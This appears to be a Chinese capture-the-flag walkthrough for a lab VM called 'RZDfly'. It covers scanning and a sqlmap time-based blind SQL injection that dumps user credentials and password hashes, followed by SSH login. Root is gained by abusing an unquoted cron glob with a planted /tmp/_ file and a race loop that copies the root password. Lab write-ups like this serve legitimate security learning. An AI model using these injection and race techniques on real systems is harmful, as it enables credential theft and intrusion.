RZDfly

信息搜集

192.168.43.85

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.43.85 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.85:22
Open 192.168.43.85:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.85
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-07 17:32 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
Initiating ARP Ping Scan at 17:32
Scanning 192.168.43.85 [1 port]
Completed ARP Ping Scan at 17:32, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:32
Completed Parallel DNS resolution of 1 host. at 17:32, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:32
Scanning 192.168.43.85 [2 ports]
Discovered open port 80/tcp on 192.168.43.85
Discovered open port 22/tcp on 192.168.43.85
Completed SYN Stealth Scan at 17:32, 0.01s elapsed (2 total ports)
Initiating Service scan at 17:32
Scanning 2 services on 192.168.43.85
Completed Service scan at 17:33, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.85
Retrying OS detection (try #2) against 192.168.43.85
NSE: Script scanning 192.168.43.85.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.00s elapsed
Nmap scan report for 192.168.43.85
Host is up, received arp-response (0.00052s latency).
Scanned at 2026-05-07 17:32:59 CST for 10s

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian))
|_http-title: Maze
|_http-server-header: Apache/2.4.66 (Debian)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
MAC Address: 08:00:27:53:73:55 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Android 5 - 10 (Linux 3.4 - 3.18) (93%), Linux 2.6.32 (93%), Google Chromecast or Roku TV (Linux 4.9) (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%), Linux 5.10 - 5.19 (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 2.6.32 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.99%E=4%D=5/7%OT=22%CT=%CU=30023%PV=Y%DS=1%DC=D%G=N%M=080027%TM=69FC5C55%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=21)
SEQ(SP=105%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=22)
OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5=M5B4ST11NW8%O6=M5B4ST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW8%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.000 days (since Thu May 7 17:33:07 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.43.85

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:33
Completed NSE at 17:33, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.46 seconds
Raw packets sent: 47 (3.672KB) | Rcvd: 31 (2.616KB)
  • 22 SSH
  • 80 HTTP

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿Eecho)-[~]
└─# gobuster dir -u http://192.168.43.85/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back,cgi,jpg
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.43.85/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: txt,html,back,cgi,jpg,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 936]
login.php (Status: 302) [Size: 0] [--> index.html]
register.php (Status: 200) [Size: 981]
logout.php (Status: 302) [Size: 0] [--> index.html]
dashboard.php (Status: 302) [Size: 0] [--> index.html]
server-status (Status: 403) [Size: 318]
Progress: 1543906 / 1543906 (100.00%)
===============================================================
Finished
===============================================================

经过bp扫描发现一个sql注入

image

sqlmap跑注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# sqlmap -r sqlmap.txt --batch -D maze -T users --dump
___
__H__
___ ___["]_____ ___ ___ {1.10.4#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:54:05 /2026-05-07/

[17:54:05] [INFO] parsing HTTP request from 'sqlmap.txt'
[17:54:05] [INFO] resuming back-end DBMS 'mysql'
[17:54:05] [INFO] testing connection to the target URL
got a 302 redirect to 'http://192.168.43.85/index.html'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=8650e27f642...248262ecb5'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 8230 FROM (SELECT(SLEEP(5)))NhYU) AND 'oIyh'='oIyh&password=123
---
[17:54:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.66, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:54:05] [INFO] fetching columns for table 'users' in database 'maze'
[17:54:05] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[17:54:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:54:20] [INFO] adjusting time delay to 1 second due to good response times
3
[17:54:20] [INFO] retrieved: id
[17:54:26] [INFO] retrieved: username
[17:54:48] [INFO] retrieved: password
[17:55:16] [INFO] fetching entries for table 'users' in database 'maze'
[17:55:16] [INFO] fetching number of entries for table 'users' in database 'maze'
[17:55:16] [INFO] retrieved: 628
[17:55:27] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[17:55:29] [INFO] retrieved: seady1ECq9hD4VCkWQMH
[17:56:35] [INFO] retrieved: admin
[17:56:49] [INFO] retrieved: 2
[17:56:52] [INFO] retrieved: bamuwe
[17:57:09] [INFO] retrieved: bamuwe
[17:57:25] [INFO] retrieved: 3
[17:57:28] [INFO] retrieved: $2y$12$DhDKzqoWvVgPJCn0Y9ipqOmi.DExmEZ/OKAOY6Sthqtil1jROX8mS
[18:01:18] [INFO] retrieved: Eecho
[18:01:33] [INFO] retrieved: 4
[18:01:37] [INFO] retrieved: $2y$12$tOHpJn57IqRp1xdMGD4GCurKthwKx9Gj61p/tqhC6N74

泄露了凭证seady1ECq9hD4VCkWQMH

ssh登录bamuwe用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# ssh bamuwe@192.168.43.85
bamuwe@192.168.43.85's password:
Permission denied, please try again.
bamuwe@192.168.43.85's password:
Linux RZDfly 6.19.14-1-liquorix-amd64 #1 ZEN SMP PREEMPT liquorix 6.19-11.1~trixie (2026-04-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bamuwe@RZDfly:~$ id
uid=1001(bamuwe) gid=1001(bamuwe) groups=1001(bamuwe),100(users)
bamuwe@RZDfly:~$

提权

上传pspy可以发现有个定时任务在读 root 的密码

image

这是一个参数注入(Argument Injection)/ 逻辑劫持漏洞。

关键信息:

  • 执行权限: UID=0​(以 root 权限运行)。
  • 敏感文件: 试图读取 /root/rootpass.txt(很可能是 root 密码或 Flag)。
  • 过滤行为: 试图通过 tr -d [A-Za-z@_@]​ 过滤掉所有大小写字母、@​ 和 _​,仅保留数字输出到 /tmp/.a
  • 自清理: 写入完成后,立即执行 rm .a 销毁痕迹。

漏洞原理分析

本题的突破口在于两个漏洞的完美结合:Bash 通配符扩展(Globbing)导致的参数劫持 以及 ​文件写入与删除之间的时间窗口(条件竞争)

漏洞一:通配符扩展(Globbing)劫持 tr 参数

在原始命令中,tr​ 的过滤参数 [A-Za-z@_@]没有加引号

Bash

1
tr -d [A-Za-z@_@]

当 Bash 解析这行命令时,其逻辑如下:

  1. 未匹配到文件时(默认): 如果当前目录(即 /tmp​)下没有符合该模式的单字符文件,Bash 会将 [A-Za-z@_@]​ 作为普通字符串传递给 tr​,从而过滤掉所有字母和 @_@

  2. 匹配到文件时(漏洞触发): 如果我们在 /tmp​ 目录下创建一个名为 _​ 的文件(因为 _​ 属于该字符集区间)。Bash 在执行命令前,会优先进行通配符扩展,将 [A-Za-z@_@]​ 翻译替换为文件名 _

    • 替换后的实际执行命令变为:tr -d _
    • 结果: 本本应该过滤掉所有字母的命令,现在​仅仅过滤下划线 _ ​,原本包含字母和数字的完整密码得以被完整写入 .a

漏洞二:写入与删除的时间差(条件竞争 Race Condition)

虽然命令末尾有 && rm .a​,但在数据写入 .a​ 到执行 rm​ 彻底销毁文件之间,存在一个极短的物理时间窗口(通常在几毫秒到微秒级别)。只要我们通过高频循环脚本在后台不断读取 /tmp/.a​,就能赶在 rm 执行前将内容复制出来。

漏洞利用链设计 (Exploit)

  1. 第一步:/tmp​ 目录下创建一个名为 _​ 的文件,利用通配符扩展劫持 tr 过滤规则,保留完整密码。
  2. 第二步: 编写一个高频自循环的 Bash 监听脚本,实时监控 /tmp/.a 并在其生成瞬间将内容复制到我们有权限读取的用户目录下。
  3. 第三步: 等待定时任务触发,获取完整密码,利用 su​ 切换到 root 成功提权。

以普通用户 bamuwe​ 登录系统,在 /tmp 目录下创建劫持文件:

1
touch /tmp/_

在终端中执行以下一键监听脚本。该脚本会以极高频率检测并抓取 .a 的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
while true; do
if [ -f /tmp/.a ]; then
# 瞬间拷贝内容到 bamuwe 用户目录下,防止被 rm 删掉
cat /tmp/.a > /home/bamuwe/loot.txt 2>/dev/null

# 检查是否成功抓取到非空内容
if [ -s /home/bamuwe/loot.txt ]; then
echo "[+] 成功捕获密码!内容如下:"
cat /home/bamuwe/loot.txt
break
fi
fi
done

这里不能su切换到root因为su没有s位

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
bamuwe@RZDfly:/tmp$ su root
Password:
su: Authentication failure
bamuwe@RZDfly:/tmp$ ls -al /bin/su
-rwxr-xr-x 1 root root 84360 May 9 2025 /bin/su
bamuwe@RZDfly:/tmp$ ssh root@127.0.0.1
root@127.0.0.1's password:
Linux RZDfly 6.19.14-1-liquorix-amd64 #1 ZEN SMP PREEMPT liquorix 6.19-11.1~trixie (2026-04-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 4 19:34:37 2026 from 192.168.3.84
root@RZDfly:~# id
uid=0(root) gid=0(root) groups=0(root)
root@RZDfly:~#